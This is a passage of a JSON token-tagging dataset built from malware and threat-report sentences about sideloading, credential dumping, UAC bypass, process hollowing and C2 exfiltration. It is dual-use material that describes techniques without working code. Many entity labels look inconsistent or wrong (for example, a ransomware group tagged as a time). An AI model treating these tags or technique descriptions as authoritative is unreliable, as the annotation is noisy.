], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "features", "multiple", "flags", "that", "could", "be", "set", "as", "command", "line", "arguments" ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Persistence", "is", "maintained", "after", "boot/reboot", "via", "malicious", "autostart", "registry", "keys." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "utilizes", "legitimate", "programs", "to", "side-load", "the", "group’s", "own", "DLL", "to", "execute", "their", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malicious", "commands", "are", "executed", "via", "WMI", "as", "a", "means", "of", "“living", "off", "the", "land”", "and", "avoiding", "detection." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "execute", "commands", "via", "scheduled", "tasks/jobs." ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Files", "dropped", "in", "the", "victim’s", "environment", "by", "Vice", "Society", "may", "have", "been", "altered", "to", "appear", "legitimate." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attempts", "to", "disable", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attempts", "to", "disable", "or", "modify", "endpoint", "security,", "such", "as", "Microsoft", "Defender,", "on", "compromised", "devices." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "utilizes", "comsvcs.dll", "to", "dump", "credentials", "from", "Local", "Security", "Authority", "Subsystem", "Service." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDP", "is", "used", "by", "the", "group", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Lateral", "tool", "transfers", "have", "been", "used", "to", "move", "tools", "and", "files", "from", "one", "compromised", "system", "to", "another,", "including", "SMB", "and", "RDP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "to", "exfiltrate", "data", "to", "external", "C2", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "exfiltrate", "data", "directly", "to", "C2", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tools", "such", "as", "SystemBC", "and", "proprietary", "backdoors", "are", "known", "to", "be", "used" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Legitimate", "processes", "have", "been", "corrupted", "by", "Vice", "Society", "via", "code", "injection,", "as", "a", "means", "to", "evade", "defenses." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "is", "designed", "to", "steal", "sensitive", "information", "from", "victims'", "systems," ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "B-Purp", "B-Features", "O", "O", "O" ] }, { "tokens": [ "attackers", "used", "an", "innocent-looking", "email", "to", "lure", "victims", "into", "opening", "an", "attachment." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "we", "found", "the", "original", "email", "that", "included", "a", "ZIP", "file", "attached,", "which", "contained", "an", "ISO", "file." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sample", "uses", "obfuscation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "file", "is", "an", "obfuscated", ".NET", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "only", "uses", "one", "code", "obfuscation", "technique:", "API", "hashing." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Payload", "Obfuscation" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "each", "data", "byte", "in", "the", "HTTP", "based", "C2", "communication," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "submitted", "to", "the", "C2", "server", "through", "HTTP", "protocol", "using", "the", "POST", "method." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "the", "HTTP", "C2", "Communication", "section." ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "HTTP", "C2", "Communication" ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O" ] }, { "tokens": [ "to", "the", "C2", "through", "the", "HTTP", "protocol." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "can", "be", "found", "in", "the", "two", "bytes", "of", "the", "HTTP", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "shows", "a", "HTTP", "POST", "request", "and", "its", "corresponding", "message", "body." ], "ner_tags": [ "O", "O", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Content-Key,", "which", "is", "a", "custom", "HTTP", "header", "whose", "value", "corresponds", "to", "a", "hash", "generated", "out", "of", "the", "HTTP", "header." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "POST", "request", "(type", "27", "/", "data", "exfiltration)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "uploads", "this", "information", "to", "an", "attacker-controlled", "machine", "via", "HTTP", "POST." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "exfiltrates", "information", "to", "the", "C2", "through", "the", "HTTP", "protocol." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "HTTP", "POST", "request", "(type", "27", "/", "data", "exfiltration)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "ISO", "file", "opener", "that", "mounts", "and", "opens", "the", "file", "with", "a", "simple", "double-click." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "the", "victim,", "the", "opening", "process", "simply", "looks", "like", "a", "regular", "directory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", ".NET", "file", "using", "process", "hollowing,", "which", "is", "a", "code", "injection", "technique", "in", "which", "an", "attacker", "removes", "legitimate", "code", "from", "an", "executable", "and", "replaces", "it", "with", "malicious", "code." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "process", "hollowing", "was", "used", "to", "inject", "a", "malicious", "PE", "file", "into", "the", "legitimate", "process", "called", "aspnet_compiler.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "use", "this", "technique", "to", "retrieve", "export", "functions", "from", "loaded", "libraries" ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "the", "corresponding", "APIs", "in", "the", "appropriate", "library." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "via", "the", "MoveFileExW", "or", "CopyFileW", "Windows", "API." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "B-SamFile", "B-Tool", "O" ] }, { "tokens": [ "Then,", "it", "creates", "and", "sets", "a", "new", "value", "for", "the", "registry", "key", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "In", "order", "to", "establish", "persistence", "on", "the", "targeted", "host,", "the", "malware", "starts", "by", "saving", "a", "copy", "of", "itself", "in", "a", "new", "folder", "in", "the", "%APPDATA%", "directory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "searches", "for", "and", "exfiltrates", "the", "following", "information:", "OS", "architecture", "Built-in", "admin", "Domain", "host", "name", "Hostname", "Local", "admin", "Operating", "system", "Screen", "resolution" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Username", "information" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Exfiltrate", "keylogger", "data" ], "ner_tags": [ "O", "B-HackOrg", "O" ] }, { "tokens": [ "Keylogger", "database" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "can", "use", "additional", "payload", "types" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exfiltrate", "screenshots" ], "ner_tags": [ "B-SamFile", "B-HackOrg" ] }, { "tokens": [ "Potential", "hidden", "files" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "It", "collects", "sensitive", "data", "from", "web", "browsers," ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "These", "functions", "are", "made", "to", "steal", "credentials", "from", "different", "types", "of", "applications", "and", "services", "on", "the", "Windows", "operating", "system:", "Browsers:", "Safari,", "Internet", "Explorer,", "Firefox", "and", "Chromium-based", "browsers" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "adopting", "publicly", "disclosed", "proof-of-concept", "(POC)", "code", "shortly", "after", "it", "is", "released", "to", "exploit", "vulnerabilities", "in", "internet-facing", "applications." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "their", "initial", "exploitation", "of", "vulnerable", "internet-facing", "applications," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "continues", "to", "use", "older", "vulnerabilities,", "especially", "Log4Shell,", "to", "compromise", "unpatched", "devices" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "After", "gaining", "initial", "access", "to", "an", "organization", "by", "exploiting", "a", "vulnerability", "with", "a", "public", "POC," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "as", "several", "adversaries", "are", "exploiting", "CVE-2022-47966", "for", "initial", "access.", "Apache", "Log4j2", "(aka", "Log4Shell)" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enable", "RDP", "connections." ], "ner_tags": [ "O", "B-Way", "O" ] }, { "tokens": [ "can", "use", "the", "Active", "Directory", "database", "to", "access", "credentials", "for", "users’", "accounts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "credentials", "are", "accessed", "and", "the", "target", "organization", "has", "not", "reset", "corresponding", "passwords,", "the", "actors", "can", "log", "in", "with", "stolen", "credentials", "and", "masquerade", "as", "legitimate", "users," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "could", "also", "gain", "access", "to", "other", "systems", "where", "individuals", "may", "have", "reused", "their", "passwords." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "persist", "in", "target", "environments", "and", "deploy", "additional", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "backdoor", "with", "the", "ability", "to", "download", "and", "run", "additional", "tools" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "I-Features", "I-Features" ] }, { "tokens": [ "create", "scheduled", "tasks", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scheduled", "Task", "Creation", "or" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Remote", "Task", "Creation/Update", "using", "Schtasks", "Process" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "group", "crafts", "bespoke", "phishing", "emails,", "often", "purporting", "to", "contain", "information", "on", "security", "policies", "that", "affect", "countries", "in", "the", "Middle", "East,", "to", "deliver", "weaponized", "documents", "to", "individuals", "of", "interest." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "I-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "read", "files," ], "ner_tags": [ "O", "I-Features", "O" ] }, { "tokens": [ "gather", "information", "on", "an", "infected", "host,", "and", "send", "details", "back", "to", "the", "attackers." ], "ner_tags": [ "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Commands", "executed", "by", "WMI", "on", "new", "hosts" ], "ner_tags": [ "O", "O", "O", "B-Time", "O", "O", "O" ] }, { "tokens": [ "script", "to", "deobfuscate", "the", "control", "flow", "of", "shellcode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malware", "immediately", "decrypts", "the", "third", "layer" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "decrypts", "the", "c2", "URL" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Use", "NtQueryInformationProcess", "API" ], "ner_tags": [ "O", "B-Way", "O" ] }, { "tokens": [ "It", "decrypts", "an", "encrypted", "payload," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Payload", "decryption", "function." ], "ner_tags": [ "B-Way", "B-HackOrg", "O" ] }, { "tokens": [ "the", "payload", "decryption", "key" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "deobfuscated", "code", "of", "GuLoader’s", "shellcode." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "using", "stack", "to", "decrypt", "strings" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "script", "to", "restore", "deobfuscate", "control", "flow." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "control", "flow", "obfuscation" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "encrypted", "shellcode’s", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "encrypted", "payload", "from", "c2." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "arithmetic", "value", "calculations" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "an", "encrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "shellcode", "control", "flow", "obfuscation" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "control", "flow", "obfuscation." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Unpacking", "of", "GuLoader’s", "shellcodes." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "packed", "using", "NSIS", "installer." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "UNPACKING", "GULOADER’S", "SHELLCODE" ], "ner_tags": [ "B-Idus", "B-Idus", "B-HackOrg" ] }, { "tokens": [ "It", "then", "calls", "CallWindowProcW", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "B-Tool" ] }, { "tokens": [ "Uses", "EnumWindows", "API" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Uses", "EnumDeviceDrivers", "and", "GetDeviceDriverBaseNameA", "APIs." ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Uses", "MsiEnumProductsA", "and", "MsiGetProductInfoA", "APIs." ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Uses", "OpenSCManagerA", "and", "EnumServicesStatusA", "APIs." ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Uses", "NtSetInformationThread", "API" ], "ner_tags": [ "O", "B-SamFile", "O" ] }, { "tokens": [ "DbgBreakPoint", "and", "DbgUiRemoteBreakin", "API" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "it", "starts", "payload", "execution", "using", "the", "ZwCreateThreadEx", "API." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Tool" ] }, { "tokens": [ "call", "RtlAddVectoredExceptionHandler", "API" ], "ner_tags": [ "O", "B-SamFile", "O" ] }, { "tokens": [ "This", "shellcode", "has", "complex", "obfuscation,", "consisting", "of", "junk", "code" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "dynamic", "API", "resolution" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "use", "process", "hollowing", "to", "inject", "decrypted", "payload", "into", "child", "process", "and", "resolves", "its", "Import", "Address", "Table." ], "ner_tags": [ "O", "B-Tool", "B-Tool", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DLL", "sideloading," ], "ner_tags": [ "B-SamFile", "B-Features" ] }, { "tokens": [ "program", "first", "sideloads", "u2ec.dll,", "which", "then", "loads", "the", "payload", "file", "usb.ini" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "malware", "rzlog4cpp.dll", "is", "sideloaded" ], "ner_tags": [ "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "which", "is", "used", "for", "the", "first", "sideloading." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "including", "the", "use", "of", "DLL", "sideloading" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Once", "the", "malicious", "DLL", "is", "sideloaded,", "it", "will", "drop", "the", "legitimate", "EXE", "file", "and", "the", "malicious", "DLL", "file,", "which", "are", "embedded", "in", "the", "resource", "section", "of", "the", "DLL", "file." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "First-stage", "legitimate", "executable", "for", "DLL", "sideloading" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Second-stage", "legitimate", "executable", "for", "DLL", "sideloading" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "files", "have", "XOR-encrypted", "content", "to", "prevent", "detection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "another", "payload", "that", "is", "XOR-encrypted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "applies", "obfuscation", "techniques" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "reads", "the", "encrypted", "configuration", "filecan" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "encrypted", "configuration." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "logging", "strings", "are", "encrypted", "with", "a", "single", "byte", "in", "XOR", "operations", "as" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "obfuscation", "mechanisms." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "an", "increasing", "number", "of", "obfuscations", "are", "being", "adopted", "to", "thwart", "static", "analysis." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "containing", "one-byte", "XOR", "encrypted", "sections" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "will", "decrypt", "this", "file", "with", "a", "single", "byte", "in", "XOR", "operations,", "find", "the", "PE", "header,", "and", "drop", "the", "payload", "to", "the", "specified", "path." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "after", "decrypting", "the", "frData", "member", "in" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decryption", "function" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "It", "will", "then", "decrypt", "the", "encrypted", "payload", "with", "the", "predefined", "RC4", "key" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "decryption,", "it", "then", "checks", "if", "the", "first", "byte", "of", "the", "decrypted", "payload" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "After", "this", "is", "decrypted," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "will", "continue", "to", "read", "and", "decrypt", "goopdate" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C&C", "traffic", "of", "the", "PUBLOAD", "HTTP", "variant" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "communicates", "to", "its", "C&C", "servers", "over", "the", "MQTT", "protocol,", "which", "is", "commonly", "used", "in", "internet-of-things", "(IoT)", "devices" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "malware", "that", "communicates", "over", "the", "MQTT", "protocol." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Command", "codes", "in", "the", "PUBLOAD", "HTTP", "variant" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "HTTP", "variant" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "HTTP", "variant" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "The", "data", "in", "the", "HTTP", "body", "is", "the", "same", "as", "the", "past", "variant," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "variant" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "supports", "data", "upload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "group", "used", "certutil.exe", "to", "download", "the", "legitimate", "WinRAR", "binary", "as", "rar1.exe", "from", "the", "server" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "downloading", "malware" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SecTeam" ] }, { "tokens": [ "The", "certutil.exe", "program", "downloads", "the", "WinRAR", "binary" ], "ner_tags": [ "O", "B-SamFile", "O", "B-Features", "O", "B-Way", "O" ] }, { "tokens": [ "the", "threat", "actors", "used", "PowerShell", "to", "download", "multiple", "malware", "and", "archives", "from", "the", "server" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "command", "execution." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "its", "shell", "open", "command." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "create", "a", "reverse", "shell." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "It", "will", "then", "create", "a", "reverse", "shell", "via", "ncat.exe", "to", "the", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "backdoor", "that", "is", "capable", "of", "executing", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "including", "adding", "more", "command-line", "arguments" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "also", "supports", "command-line", "arguments," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "we", "discovered", "several", "tools", "used", "for", "UAC", "bypass", "in", "Windows", "10." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "HackTool.Win32.ABPASS", "is", "a", "tool", "used", "to", "bypass", "UAC", "in", "Windows", "10." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "HackTool.Win32.CCPASS", "is", "another", "tool", "that", "is", "also", "used", "for", "Windows", "10", "UAC", "bypass" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O" ] }, { "tokens": [ "This", "service", "has", "the", "highest", "privileges", "that", "can", "be", "abused", "for", "Windows", "10", "UAC", "bypass." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O" ] }, { "tokens": [ "UAC", "bypass", "will", "be", "executed", "via", "the", "AppInfo", "RPC", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "UAC", "Bypass", "via", "the", "CMSTPLUA", "COM", "interface" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UAC", "Bypass", "via", "the", "AppInfo", "RPC", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UAC", "bypass", "will", "be", "executed" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "UAC", "bypass", "is", "executed", "via", "token", "manipulation." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "UAC", "bypass", "is", "executed" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "net", "user", "<username>" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "and", "the", "following", "data", "is", "written", "into", "registry:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Registry", "keys", "changed" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "It", "creates", "a", "new", "Shell", "in", "the", "registry." ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "it", "installs", "itself", "to", "%programdata%", "and", "then", "sets", "the", "registry", "run", "key", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "invokes", "the", "undocumented", "API", "UserAssocSet", "to", "update", "the", "file", "association." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "strings", "and", "the", "APIs", "used", "by" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "installs", "itself", "by", "creating", "an", "InstallSvc", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "creating", "aservice", "called", "InstallSvc" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "Creates", "a", "service" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "which", "is", "injected", "to", "conduct", "backdoor", "behaviors." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "inject", "it", "into", "winver.exe", "for", "the", "next-stage", "payload" ], "ner_tags": [ "O", "B-Features", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "It", "will", "read", "the", "next", "stage", "payloads,", "free.plg", "and", "main.plg,", "and", 